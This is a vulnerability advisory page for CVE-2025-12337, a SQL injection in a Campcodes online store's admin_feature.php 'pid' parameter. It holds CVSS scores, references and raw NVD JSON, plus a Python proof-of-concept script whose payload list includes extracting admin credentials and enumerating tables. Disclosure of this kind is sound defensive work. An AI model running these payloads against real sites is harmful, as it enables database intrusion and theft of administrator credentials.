CVE-2025-12337

Description

A security flaw has been discovered in Campcodes Retro Basketball Shoes Online Store 1.0. This affects an unknown part of the file /admin/admin_feature.php. Performing a manipulation of the argument pid results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:campcodes:retro_basketball_shoes_online_store:1.0:*:*:*:*:*:*:* - VULNERABLE

Campcodes Retro Basketball Shoes Online Store 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2025-12337 SQL Injection PoC
# Target: Campcodes Retro Basketball Shoes Online Store 1.0
# Location: /admin/admin_feature.php
# Parameter: pid

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in admin_feature.php
    """
    # Target endpoint
    url = f"{target_url}/admin/admin_feature.php"
    
    # Malicious payload in pid parameter
    params = {
        'pid': payload
    }
    
    try:
        response = requests.get(url, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None

# Example payloads for different injection techniques
PAYLOADS = {
    'basic_error': "1' AND 1=1 -- ",
    'union_select': "1' UNION SELECT 1,2,3,4,5,6,7,8 -- ",
    'database_version': "1' UNION SELECT NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL -- ",
    'table_enumeration': "1' UNION SELECT NULL,table_name,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database() -- ",
    'admin_creds': "1' UNION SELECT NULL,username,password,NULL,NULL,NULL,NULL,NULL FROM admin_users -- ",
    'blind_boolean': "1' AND 1=1 -- ",
    'time_blind': "1' AND SLEEP(5) -- "
}

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12337.py <target_url>")
        print("Example: python cve-2025-12337.py http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    print("[*] CVE-2025-12337 SQL Injection PoC")
    print(f"[*] Target: {target}")
    print("[*] Testing basic injection...")
    
    result = exploit_sqli(target, PAYLOADS['basic_error'])
    if result:
        print("[+] Injection point confirmed!")
        print("[*] Try union-based injection for data extraction")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-12337
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-12337
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-12337/
[4] VulDB https://vuldb.com/cve/CVE-2025-12337
[5] https://github.com/HYLCXH/CVE/issues/15
[6] https://vuldb.com/?ctiid.330124
[7] https://vuldb.com/?id.330124
[8] https://vuldb.com/?submit.674491
[9] https://www.campcodes.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-12337", "sourceIdentifier": "[email protected]", "published": "2025-10-28T01:16:11.257", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Campcodes Retro Basketball Shoes Online Store 1.0. This affects an unknown part of the file /admin/admin_feature.php. Performing a manipulation of the argument pid results in sql injection. The attack may be initiated remotely. The exploit has been released to the public and may be used for attacks."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:campcodes:retro_basketball_shoes_online_store:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "A09368E4-676B-4F86-B3BC-C9EEE1F4C280"}]}]}], "references": [{"url": "https://github.com/HYLCXH/CVE/issues/15", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.330124", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.330124", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.674491", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.campcodes.com/", "source": "[email protected]", "tags": ["Product"]}]}}